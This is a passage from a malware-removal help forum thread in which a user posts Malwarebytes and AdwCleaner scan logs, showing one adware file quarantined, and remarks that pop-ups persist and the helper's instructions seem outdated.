¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
Malwarebytes
www.malwarebytes.com
-Log Details-
Scan Date: 2/11/19
Scan Time: 7:30 AM
Log File: ccc3d460-2d8b-11e9-b3ab-0026b664e783.json
-Software Information-
Version: 3.7.1.2839
Components Version: 1.0.538
Update Package Version: 1.0.9200
License: Trial
-System Information-
OS: Windows 10 (Build 10240.16487)
CPU: x64
File System: NTFS
User: DESKTOP-OHFLJFD\Thomazing!
-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 244845
Threats Detected: 1
Threats Quarantined: 1
Time Elapsed: 3 min, 16 sec
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
-Scan Details-
Process: 0
(No malicious items detected)
Module: 0
(No malicious items detected)
Registry Key: 0
(No malicious items detected)
Registry Value: 0
(No malicious items detected)
Registry Data: 0
(No malicious items detected)
Data Stream: 0
(No malicious items detected)
Folder: 0
(No malicious items detected)
File: 1
Adware.Csdimonetize, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\GLOBAL_INSTALLER.EXE, Quarantined, [2891], [637435],1.0.9200
Physical Sector: 0
(No malicious items detected)
WMI: 0
(No malicious items detected)
(end)
-
February 10th, 2019, 08:02 PM
#15
# -------------------------------
# Malwarebytes AdwCleaner 7.2.7.0
# -------------------------------
# Build: 01-30-2019
# Database: 2019-01-25.2 (Local)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 02-11-2019
# Duration: 00:00:00
# OS: Windows 10 Pro
# Cleaned: 0
# Failed: 0
***** [ Services ] *****
No malicious services cleaned.
***** [ Folders ] *****
No malicious folders cleaned.
***** [ Files ] *****
No malicious files cleaned.
***** [ DLL ] *****
No malicious DLLs cleaned.
***** [ WMI ] *****
No malicious WMI cleaned.
***** [ Shortcuts ] *****
No malicious shortcuts cleaned.
***** [ Tasks ] *****
No malicious tasks cleaned.
***** [ Registry ] *****
No malicious registry entries cleaned.
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries cleaned.
***** [ Chromium URLs ] *****
No malicious Chromium URLs cleaned.
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries cleaned.
***** [ Firefox URLs ] *****
No malicious Firefox URLs cleaned.
*************************
[+] Delete Tracing Keys
[+] Reset Winsock
*************************
AdwCleaner[S00].txt - [2783 octets] - [09/02/2019 12:30:40]
AdwCleaner[C00].txt - [2657 octets] - [09/02/2019 12:46:19]
AdwCleaner[S01].txt - [1371 octets] - [11/02/2019 07:45:20]
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C01].txt ##########
# -------------------------------
# Malwarebytes AdwCleaner 7.2.7.0
# -------------------------------
# Build: 01-30-2019
# Database: 2019-01-25.2 (Local)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start: 02-11-2019
# Duration: 00:00:16
# OS: Windows 10 Pro
# Scanned: 31769
# Detected: 0
***** [ Services ] *****
No malicious services found.
***** [ Folders ] *****
No malicious folders found.
***** [ Files ] *****
No malicious files found.
***** [ DLL ] *****
No malicious DLLs found.
***** [ WMI ] *****
No malicious WMI found.
***** [ Shortcuts ] *****
No malicious shortcuts found.
***** [ Tasks ] *****
No malicious tasks found.
***** [ Registry ] *****
No malicious registry entries found.
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries found.
***** [ Chromium URLs ] *****
No malicious Chromium URLs found.
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries found.
***** [ Firefox URLs ] *****
No malicious Firefox URLs found.
AdwCleaner[S00].txt - [2783 octets] - [09/02/2019 12:30:40]
AdwCleaner[C00].txt - [2657 octets] - [09/02/2019 12:46:19]
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S01].txt ##########
Fruad and trojans still pops up and blocked by mwb.
Btw, seems your instructions are old like 10 years ago. Maybe you should update it. It's different now.
Thread Information
Users Browsing this Thread
There are currently 1 users browsing this thread. (0 members and 1 guests)
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|